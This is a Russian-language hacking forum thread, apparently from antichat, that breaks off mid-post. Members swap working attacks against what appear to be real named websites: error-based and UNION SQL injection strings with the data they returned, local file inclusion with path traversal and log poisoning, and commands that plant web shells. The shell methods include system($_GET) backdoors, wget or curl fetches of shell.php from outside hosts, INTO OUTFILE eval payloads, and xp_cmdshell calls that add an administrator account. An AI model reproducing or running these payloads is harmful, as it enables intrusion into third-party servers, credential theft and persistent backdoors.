Pashkela
Это чем?

раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe

раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe


http://phppgadmin.sourceforge.net/

Как вариант WSO

Подскажите, возможно ли как-нибудь все-таки скормить урл для include($MEGA-VARIABLE.'file.php'), если перед этим он редактируется вот так:
preg_replace( "/[a-z]/i", "", $MEGA-VARIABLE);

Или без вариантов?

PS Можно айпи дать напрямую, но http съедается..
Продолжаю с этим копаться.
Посмотрел сюда: http://www.php.net/manual/en/wrappers.file.php
И увидел такой вариант:
\\smbserver\share\path\to\winfile.ext
Получится ли у меня сделать финт вот так:
$MEGA-VARIABLE=\\192.192.192.192\123 ?
А в share уже положив \123\file.php с текстовой отдачей?
Если да, то подскажите please как можно по-быстрому на линуксе share сделать? только samba или есть что полегче?

Продолжаю с этим копаться.
Посмотрел сюда: http://www.php.net/manual/en/wrappers.file.php
И увидел такой вариант:
\\smbserver\share\path\to\winfile.ext
Получится ли у меня сделать финт вот так:
$MEGA-VARIABLE=\\192.192.192.192\123 ?
А в share уже положив \123\file.php с текстовой отдачей?
Если да, то подскажите please как можно по-быстрому на линуксе share сделать? только samba или есть что полегче?
почему бы не попробовать?

\\smbserver\share\path\to\winfile.ext

это только для венды

Есть иньекция, но в интересных условиях.
В кратце: уязвимый параметр используется в нескольких запросах. Скрипт выплевывает данные только после успешной обработки всех запросов. Проблема в том, что количество столбцов в запросах разное.
Т.е. подбираешь количество столбцов в первом в запросе, он выполняется, а на следующем скрипт крэшится. Из вывода в итоге получаются только ошибки, скрипт просто не дорабатывает до конца.

http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5--+
MySQL error occured on line 68 in file index.php.
Error 1222: The used SELECT statements have a different number of columns
Query: [..query2..]
http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+
MySQL error occured on line 21 in file index.php.
Error 1222: The used SELECT statements have a different number of columns
Query: [..query1..]


Any ideas?

Все правильно делаю?
Ошибку не выдает, пишет item not found, т.е. сам скрипт что-то отлавливает и не выводит MySQL'ную ошибку?

index.php?id=-1+union+select+count(*),concat(version(),floor(ran d(0)*2)),3,4,5,6,7,8,9,10,11+x+from+users+group+by +x--+
где users - существующая таблица.

tak probuy

http://site.com/index.php?cat=(select*from(select+name_const(versi on(),1),name_const(version(),1))a)

Вывод ошибок есть.

http://site.com/index.php?cat=-1+select count(*),concat(version(),floor(rand(0)*2)) x from table group by x;
капец просто :)

(select*from(select+name_const(version(),1),name_c onst(version(),1))a)
Работает, но
(select*from(select+name_const(user(),1),name_cons t(user(),1))a)

уже не работает: Error 1210: Incorrect arguments to NAME_CONST
Либо я не понял принципа, либо в чем-то другом проблема?

vot..

user()
http://www.radioerre.net/index.php?id=(select+1+from+(select+count(0),conca t((select+user()+from+information_schema.tables+li mit+20,1),floor(rand(0)*2))+from+information_schem a.tables+group+by+2+limit+20,1)a)
Sql115794@62.149.130.18

database()
http://www.radioerre.net/index.php?id=(select+1+from+(select+count(0),conca t((select+database()+from+information_schema.table s+limit+20,1),floor(rand(0)*2))+from+information_s chema.tables+group+by+2+limit+20,1)a)
Sql115794_4

@@version_compile_os
http://www.radioerre.net/index.php?id=(select+1+from+(select+count(0),conca t((select+@@version_compile_os+from+information_sc hema.tables+limit+20,1),floor(rand(0)*2))+from+inf ormation_schema.tables+group+by+2+limit+20,1)a)
redhat-linux-gnu

Пипл, кто юзал Joomla! 1.0.15 Lavra Edition 2008
подскажите как шел залить...
Или php код воспроизвести!!

в джумле легко шелл залить если есть доступ в админку, устанавливаешь там модуль джумла ксплорер и через него уже спокойно делаешь свои дела

Gorev, а можно по подробнее.
Доступ к админке есть....

Gorev, а можно по подробнее.
Доступ к админке есть....


проще через шаблоны, если правятся

LokbatanLi
То, что надо - работает.
Кто-нибудь может "на пальцах" объяснить суть бага? В блоге Qwazar'a читал, но там тема несильно раскрыта.

И, кстати, почему group_concat не воркает в таком запросе?

проще через шаблоны, если правятся

править то можно, только он ошибку выдает
"Неверная контрольная суммафайла......."

и в чом фишка немогу понять...

GOGA075 скачиваешь joomla xplorer и в админке устанавливаешь данный модуль , если не понял пиши в аську 8383один72

Gorev, спасибо за помощ. Шел еле-еле залил. Прав никаких нету, щитай зря промучался!!

GOGA075 скачиваешь joomla xplorer и в админке устанавливаешь данный модуль , если не понял пиши в аську 8383один72

Нафиг не надо, просто грузишь новый модуль в наглую wso.php, оно напишет "бла-бла-бла, идите нафинг", но шелл таки под оригинальным названием останется в /media/wso.php или /tmp/wso.php

попробуй такой вариант http://forum.antichat.ru/showpost.php?p=1809203&postcount=173

esli tebya mysql version() toqda.. http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_const(version(),1),n ame_const(version(),1))a)

нет версию и дбнайм я сам смогу взят но кто нит подскажите как далше вывести имена таблиц и колонок
может подскажет наши профи насчет моего вопроса?

shell_c0de, да там прав на самом сервере нету, только чтение скриптов!!

ссори за тупость...
Есть скуля
http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+concat_ws(0x3a%20,user(),database( %20%20),version())--

что делать дальше?(

новичек в этом деле....

2ExQ
там 4 версия..подбирай названия табличеk

2ExQ
там 4 версия..подбирай названия табличеk


Скинь свою icq в пм

жёсткий ламер в этом(

2ExQ
http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+название таблички --

Ув. форумчане, вопрос следующий: на сайте есть скуль, имеется 1 БД (кроме стандартной). Данных о логине\пароле в этой БД нет. Может ли такое быть, или я что-то неправильно делаю?

Сам сайт (http://www.bereselite.ru/cars.html?id=3944)

конечно все может быть, данные о юзвере админе могут быть прописаны в файле на сервере...

Что значит эта ошибка?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7

Что значит эта ошибка?
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/kniga-market/kniga-market.kiev.ua/about.php on line 7

то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.

то что ты ковычку зафигачил в параметр =)) Возможно есть sql inj. ты покажи запрос который ты отправляешь. Если это выдаёт просто скрипт без параметров, то скорее всего он просто криво написан.


http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+1+from+тут название таблички --

А пройти по указанному линку никак, не?
http://kniga-market.kiev.ua/about.php - просто бага
http://kniga-market.kiev.ua/producers.php?category=10' - скуля
http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4+--
u_knigamarke@localhost:4.1.22-log:knigamarket

А пройти по указанному линку никак, не?
http://kniga-market.kiev.ua/about.php - просто бага
http://kniga-market.kiev.ua/producers.php?category=10' - скуля
http://kniga-market.kiev.ua/producers.php?category=10+union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4+--
u_knigamarke@localhost:4.1.22-log:knigamarket


Ссори.. сильно не пинайте)
совсем ламер в этих делах :confused:


Ну а что делать дальше? :(

Ну а что делать дальше? :(
Читать форум, статей куча, и не флудить в теме.
Если читать не умеешь, а сайт нужен, дать денег кому-нить, кто сломает. Всё просто

Тема с выводом инфы через ошибки такая забавная.

Раз:
view.php?id=(select+1+from+(select+count(0),concat ((select+concat_ws(0x3a,user(),version())+from+use rs+LIMIT+0,1),floor(rand(0)*3))+from+information_s chema.tables+group+by+2+limit+1,1)a)

Error 1062: Duplicate entry 'user@siteserv:5.1.29-rc-log1' for key 'group_key'

Два:
view.php?id=(select+1+from+(select+count(0),concat ((select+concat_ws(0x3a,user,password)+from+users+ LIMIT+0,1),floor(rand(0)*3))+from+information_sche ma.tables+group+by+2+limit+1,1)a)

Item not found //WTF? Поле password точно есть.

Три:
view.php?id=(select+1+from+(select+count(0),concat ((select+user+from+users+LIMIT+0,1),floor(rand(0)* 3))+from+information_schema.tables+group+by+2+limi t+1,1)a)
Error 1062: Duplicate entry 'admin1' for key 'group_key'

Четыре:
view.php?id=(select+1+from+(select+count(0),concat ((select+password+from+users+LIMIT+0,1),floor(rand (0)*3))+from+information_schema.tables+group+by+2+ limit+1,1)a)
Item not found //WTF

Пять:
view.php?id=(select+1+from+(select+count(0),concat ((select+password+from+users+WHERE+user='admin'),f loor(rand(0)*3))+from+information_schema.tables+gr oup+by+2+limit+1,1)a)
Item not found //WTF

Шесть:
view.php?id=(select+1+from+(select+count(0),concat ((select+substring(password,1,5)+from+users+LIMIT+ 0,1),floor(rand(0)*3))+from+information_schema.tab les+group+by+2+limit+1,1)a)
Error 1062: Duplicate entry 'mypas1' for key 'group_key'

В итоге работает такой костыль:
view.php?id=(select+1+from+(select+count(0),concat ((select+concat_ws(user,substring(password,1,300)) +from+users+LIMIT+0,1),floor(rand(0)*3))+from+info rmation_schema.tables+group+by+2+limit+1,1)a)
Error 1062: Duplicate entry 'admin:mypassword1' for key 'group_key'


И таки откуда такая проблема и как ее обойти? Substring - не выход, я считаю.

Nek1t
https://forum.antichat.ru/showpost.php?p=1802753&postcount=21

Оно?

Qwazar (https://forum.antichat.ru/member.php?u=17119)
Оно.
Кстати, как показала практика, необязательно резать строку, достаточно ее просто прогнать через эти функции в стиле substr(column,1,350). Ограничение будет, но уже меньше. Причем число 350 получается как некая константа минус длина имен колонок в подзапросе(или вроде того). Надо дальше копать.
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c,mid(val,1,490),0x7c7c)+from +settings+LIMIT+0,1),floor(rand(0)*3))+from+inform ation_schema.tables+group+by+2+limit+1,1)a)

Cрабатывает.

view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,490),0x7c7c)+fr om+settings+LIMIT+0,1),floor(rand(0)*3))+from+info rmation_schema.tables+group+by+2+limit+1,1)a)

Не срабатывает.

view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,489),0x7c7c)+fr om+settings+LIMIT+0,1),floor(rand(0)*3))+from+info rmation_schema.tables+group+by+2+limit+1,1)a)

Срабатывает.

Такой вопрос,
как залить шелл = \
vb 4.0.2
Есть доступ к админке, добавил модуль в faq_complete с содержимым
system($_GET["cmd"]);
OC там Linux
Пишу в адресной строке:
http://forum.site.ru/faq.php?cmd=ls
Вижу файлы и папки корня)
Делаю такой запрос в адресной строке:
forum.site.ru/faq.php?cmd=wget www.sitesshelom.ru/shell.php
Долго думает ) и потом вылазит 404 not found, вообщем шелл не заливается = \
подскажите как залить еще можно = \

Такой вопрос,
как залить шелл = \
vb 4.0.2
Есть доступ к админке, добавил модуль в faq_complete с содержимым

OC там Linux
Пишу в адресной строке:
http://forum.site.ru/faq.php?cmd=ls
Вижу файлы и папки корня)
Делаю такой запрос в адресной строке:
forum.site.ru/faq.php?cmd=wget www.sitesshelom.ru/shell.php
Долго думает ) и потом вылазит 404 not found, вообщем шелл не заливается = \
подскажите как залить еще можно = \

curl --output /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
fetch -o /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
wget -o /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
get www.sitesshelom.ru/shell.php > /kuda/zalivaem/shell.php

если allow_url_include On - include("http://www.sitesshelom.ru/shell.php");

copy('http://www.sitesshelom.ru/shell.php','/kuda/zalivaem/shell.php');

можно ли раскрутить следующий инклуд:
http://www.petshopdamigos.gr/index.php?action=xyz
=>
Warning: require(pages/action_xyz.php) [function.require]: failed to open stream: No such file or directory in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php on line 408

можно ли раскрутить следующий инклуд:
http://www.petshopdamigos.gr/index.php?action=xyz
=>
Warning: require(pages/action_xyz.php) [function.require]: failed to open stream: No such file or directory in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php on line 408


если бы опция magic quotes не была включена, то

http://www.petshopdamigos.gr/index.php?action=/../../../../../../../c:boot.ini%00

http://www.petshopdamigos.gr/index.php?action=/../../index.php......................................... .................................................. .................................................. ............................................

если бы опция magic quotes не была включена, то

http://www.petshopdamigos.gr/index.php?action=/../../../../../../../c:boot.ini%00

а не можно заxeк‎сить?

а не можно заxeк‎сить?

выше способ дали рабочий

можно ли раскрутить следующий инклуд:
http://www.petshopdamigos.gr/index.php?action=xyz
=>
Warning: require(pages/action_xyz.php) [function.require]: failed to open stream: No such file or directory in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php on line 408кстати в поле поиска пасивка.
чтоб обойти mg юзаем асции
<script>alert(String.fromCharCode(88,83,83))</script>
ps http://forum.xakep.ru/m_1298634/tm.htm - понрвилось

попугай, wildshaman, Strilo4ka спасибо за помощь и советы


копаю дальше
http://www.petshopdamigos.gr/index.php?action=/../../../../../../inetpub/vhosts/petshopdamigos.gr/httpdocs/admin/info - phpinfo()

есть
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \index.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \info.php
но текст их посмотреть нельзя, только исполнение через require()

http://www.petshopdamigos.gr/test - basic авторизация, ни .htaccess ни .htpasswd там нет, да и сервер там Microsoft-IIS/6.0

доступ к соседям закрыт - Permission denied

sql inj вроде как нигде нет

через http://www.petshopdamigos.gr/index.php?action=05 можно попасть на форму, которая через mail() будет слать письмо

http://www.petshopdamigos.gr/index.php?action=09 ссылок на которую ниоткуда нет выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \action_09.php on line 9


есть идеи с какой стороны еще можно залезть ?

не выводит таблицы ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
в чем может быть проблема?

зато выводит колонки
ID=1+OR+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATI ON_SCHEMA.COLUMNS)--

возможно фильтр на TABLE_NAME, попробуй перевести TABLE_NAME в hex или char
или фильтр на INFORMATIO N_SCHEMA.TABLES - тоже обходится, но как не помню, пусть более просвещенные подскажут ;)

возможно фильтр на TABLE_NAME, попробуй перевести TABLE_NAME в hex или char

операторы нельзя переводить в hеx или char

ой, сорри, ступил :(

странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--

выводит пустую страницу без новостей, и ошибок

странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--

выводит пустую страницу без новостей, и ошибок
так попробуй
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--

хелп) сос))

Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :
--2010-04-27 20:25:52-- http://сайт.narod.ru/wso2.php Resolving сайтnarod.ru... 213.180.199.44 Connecting to сайт.narod.ru|213.180.199.44|:80...
и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается??? :confused: :confused: :confused:

хелп) сос))

Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :
--2010-04-27 20:25:52-- http://сайт.narod.ru/wso2.php Resolving сайтnarod.ru... 213.180.199.44 Connecting to сайт.narod.ru|213.180.199.44|:80...
и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается??? :confused: :confused: :confused:


1. Писать не -o, а -O (зааглавная).
2. Правильно писать так: wget http://shell.com/shell.txt -O shell.php
-O - чтобы залить с другим именем.
-o - вместо шелла заливает по заданному адресу РЕЗУЛЬТАТ ЗАЛИВКИ, т.е. это не то.
А может прав нету? Проверь id; ls -la;
Если и вправду прав нету, то ищи где есть и делай так:
cd /tut/prava/0777/; wget http://xx.narod.ru/shell.txt -O shell.php
или в -O укажи путь новый, т.е. чтобы cd не писать.

DIEZalok Прочитай plz личку)

так попробуй +or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)-- иле так.. ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--

неее не катит....
http://www.looplifter.co.uk/news.asp?id=1

не выводит таблицы ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
в чем может быть проблема?

зато выводит колонки
ID=1+OR+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATI ON_SCHEMA.COLUMNS)--


']так попробуй
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--

неее не катит....
http://www.looplifter.co.uk/news.asp?id=1

http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+cast(table_name+ as+int)+from+information_schema.columns)--

Я конечно понимаю что методом тыка, может что-то/когда-то получится, но всё же...Для начала узнайте что находится в базе information_schema и станет намного легче искать решения проблемы.

вот объясните (незнаком я с внутренним миром бд) впервые вижу такое сочетание:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.columns)--
такой запрос что выводит? таблицу, колонку?

вроде вывод ВСЕХ колонок бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+column_name+from +information_schema.columns)--

вывод ВСЕХ таблиц бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.tables)--

pinch
http://www.looplifter.co.uk/news.asp?id=5
1. слепая sql:

http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 1)
=> так же как и при id=5

http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 2)
=> пусто

2.
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select db_name())--
=>
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Looplifter' to a column of data type int.
/news.asp, line 355
==> не такая уж и слепая

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns)--
=> так же как и при id=5

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.tables)--
=> пусто

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select count(*) from information_schema.tables)--
=> пусто

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select 'count(*) from information_schema.tables')--
=> так же как и при id=5

==> наврятли там какой-то уж очень интеллектуальный фильтр, может просто запрещены права юзеру Looplifter на чтение information_schema.tables ?

=))) эт не какаята хрень а MSSQL 2000

народ есть ли альтернативный способ как найти админку?

уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!

есть ли другой способ ?

2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/

народ есть ли альтернативный способ как найти админку?

уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!

есть ли другой способ ?

попробуй robots.txt может прокатит.......

попробуй robots.txt может прокатит.......


нету роботов,всегда проверяю

а вообще нашел хорошую прагу IntelliTampor

2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/

спасибо,папробую

не видя твой пост сам писал про прагу :)

только что нашел

народ есть ли альтернативный способ как найти админку?

уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!

есть ли другой способ ?
http://forum.xakep.ru/m_1653053/tm.htm

Strilo4ka спасибо

И еще раз возвращаясь к теме вывода данных в SQL-inj в ошибках.
Правильно понимаю, что максимум можно вывести 64 символа чистых данных(единица в конце отбрасывается), и единственный выход - резать на подстроки?

есть шелл..там есть например папка www.xxx.com
и там есть папки например тест1 тест2 и т.д///

тест1 drwxrwxrwx зеленый..тест2 красный..

в тест1 моjно все зделать а в тест2 нелзя ничево (едит уплоад)

кояда откриваеш site автоматичецки откривается папка тест2..как зделат чтоби тест1 откривался..

а что, www.xxx.com/test1/shell.php не прокатывает ?

есть вопрос насчет floor

сделал запрос чтоб прочест файли на сервере:
and (select 1 from (select count(0),concat((select+substring(load_file('/etc/passwd'),1,50) LIMIT 0,1),floor(rand(0)*3)) from information_schema.tables group by 2 limit 1,1)a)--

норм выводит но когда доходим до 494 символа то ничего не выводит.

and (select 1 from (select count(0),concat((select+substring(load_file('/etc/passwd'),1,50) LIMIT 0,1),floor(rand(0)*3)) from information_schema.tables group by 2 limit 1,1)a)--

через chat_length проверил но там 677021 символов!!!

Остальные файлы тоже читается до 494 символов. Тут на одного запроса пришлос писать 64символов так как floor большего режет. Но поэтапно тоже не больше 494 ((

Правда запрос через хедер идет. Может кто обьяснит?? И вообше тут можно into outfile делать если прав есть?

И вообше тут можно into outfile делать если прав есть?
Именно через floor хочешь? Ведь можно таким методом в подобных условиях лить:

+limit+1+into+outfile+'/путь_до_папки_доступной_на_� �апись/shell.php'+lines+terminated+by+"<?php+eval($_REQUEST[ec]);?>"--+

спс за ответ но не очень то понял тебя, в каких условиях гриш? Судя по запросу оно должно дополнят мой запрос? Хотя так не пашет

спс за ответ но не очень то понял тебя, в каких условиях гриш? Судя по запросу оно должно дополнят мой запрос? Хотя так не пашет
Когда можно внедрить команды в запрос, и имеется file_priv (естественно кавычки не должны слешироваться)
Обычно такой способ используется в слепых скулях.

есть LFI, нашел еrror.log и access.log, access читать не получается т.к. размер большой, остался только еrror.
Делаю запрос вида http://www.site.com/<? траляля ?>
В лог пишется %3C? траляля ?%3E.
Что же делать?)

<?php file_get_contents('http://lala.com/<?php eval(stripslashes($_REQUEST[lol]));?>');?>

<?php file_get_contents('http://lala.com/<?php eval(stripslashes($_REQUEST[lol]));?>');?>
[uri "/%3C?php%20file_get_contents('http://lala.com/%3C?php%20eval(stripslashes($_REQUEST[lol]));?%3E');?%3E"]

ну если ты это в адресную строку прямо все забил, то не удивительно. Ми тебе намекгул как бы, что запрос можно выполнить просто сторонним скриптом, или интекрякерами всякими, как тебе удобнее.

PS: Выполнить запрос сторонним скриптом - это значит выполнить скрипт, а не набирать его код в адресной строке браузера

в mssql если имя пользователя не sa при запросе:

http://test/news.asp?id=1+or+1=(select+system_user)--

то как я понимаю у меня не будет прав на выполнения команд?

2pinch нет от этого не зависеть
если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add'
в твоем случае можешь поменять пароль от админа (ну если превелегии есть)
?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--

есть LFI, нашел еrror.log и access.log, access читать не получается т.к. размер большой, остался только еrror.
Делаю запрос вида http://www.site.com/<? траляля ?>
В лог пишется %3C? траляля ?%3E.
Что же делать?)

<?php file_get_contents('http://lala.com/<?php eval(stripslashes($_REQUEST[lol]));?>');?>

[uri "/%3C?php%20file_get_contents('http://lala.com/%3C?php%20eval(stripslashes($_REQUEST[lol]));?%3E');?%3E"]
Это специфика браузера. Используй гхром, через него должно быть тру. Ну или как уже сказано выше, используй не браузер.

Как в phpBB 2.0.22 обойти usercp_avatar.php ??
не получаеться залить шел через аватарку. видно стоит обработка скриптом!

Или что можно воткнут в место phpinfo()
в
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=4;

штоб шел залить??

вставляй system($_GET[tu4ka])

есть таблица users

table_rows - 6

есть колонки name,pass

когда делаю запрос union+select+......version()+from+users то все нормально

а запрос union+select+......pass+from+users ничего не выдает

что посоветуете?

Konqi, попробуй shar() либо concat_ws()

Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users

count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?

Konqi, попробуй shar() либо concat_ws()

чаром нельзя,а конкат не че не может изменить ибо это функция для соединения результатов,не больше.

budden, и что мне этот код даст?
он мне просто ошибку выдает...

GOGA075
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;

then blablablabla......editprofile&cmd=phpinfo();

Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users

count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?

count(*) выдает 4

count(*) выдает 4

узнай в какой базе таблица users... потом from+*base*.users

[Feldmarschall]

с базой нет проблем, так и делаю

а unhex(hex()) и aes_decrypt(aes_encrypt не помогли

Реально отключить обработку картинки из админки в phpBB??

[Feldmarschall]
с базой нет проблем, так и делаю
а unhex(hex()) и aes_decrypt(aes_encrypt не помогли
кароче там много баз.. и почти в каждой есть users..
первая запись (limit+0,1) пуста 1,1 все идет.. линк скинул в пм есле что..
вот так допустим можешь действовать на остальных Датабазах
+union+select+group_concat(column_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 +from+information_schema.columns Where table_schema=0x63775F3631303334 AND table_name=0x77705F30317573657273--
+union+select+group_concat(column_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 +from+information_schema.columns Where table_schema=0x63775F36313033345F636F756E74696573 AND table_name=0x77705F7573657273--

[Feldmarschall]

интересно, даже очень ))

спасибо !!

есть доступ к консоли машины через скул. Вопрос можно ли открыть там порт для рдп? Я создал учетку но коннект нету вообше.

Устанавливаю в joomla мод com_joomlaxplorer_1.6.3
А он мне выдает ошибку "Внимание! - Не удалось переместить файл"
что тут не так?

Устанавливаю в joomla мод com_joomlaxplorer_1.6.3
А он мне выдает ошибку "Внимание! - Не удалось переместить файл"
что тут не так?
Права

// Здесь был Кэп

А какие именно права?

На запись (Chmod )=\
// кэп где то рядом

А какие ещо есть способы залить шел?

Тэмплэйты редактировать, там обычно PHP код, языки (х.з. кто-то ляпнул где-то, сам не проверял), Xplorer, и смотри чо там по компонентам есть.

Ctacok, php нигде не потдерживаеться, просто как текст обычный выводиться...

Edit HTML =\

// кэп не пролетал?

Народ подскажите можно как нибудь обойти htacces, суть в том что шелл залит на сайт DLE даже вычисленна прямая ссылка http://site.ru/category/m.y/d/shell.php но вот там стоит редирект и он выдает ложную страницу что типо файл отсуствует или 403 ошибка.. можно как то обойти?

Как залил шелл так же залей свою htaccess :)

... на сайт DLE даже вычисленна прямая ссылка http://site.ru/category/m.y/d/shell.php ...

на прямую совсем не похожа

Как залил шелл так же залей свою htaccess :)

залила

на прямую совсем не похожа

ну ссылка как бы через субдомен т.е site.site/*****/shel.php
а вариант с htacces не получается, нашла дырку на сайте был написан самописный скрипт с 3 кнопками обзор и не одна не проверяется на тип файла грузит все подрят, да и сайт не хилый 150 к посещений в день ТИЦ 900 и т д... вот хотелось бы вычислить куда все это заливается... может есть способы? по другим файлам если смотреть то заливаются на субдомен но если так же сгенерировать свою ссылку в No Fold при чем не настоящая страница

Вопрос по LFI.
Какие есть пути к логам и где их можно посмотреть?
Вот путь /proc/self/environ, через него я выполнил пхп команду, а где можно посмотреть под разные сервера?

a1ertso
http://forum.antichat.ru/thread49775.html

Делаю запрос к БД:

index.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
vendor_id,
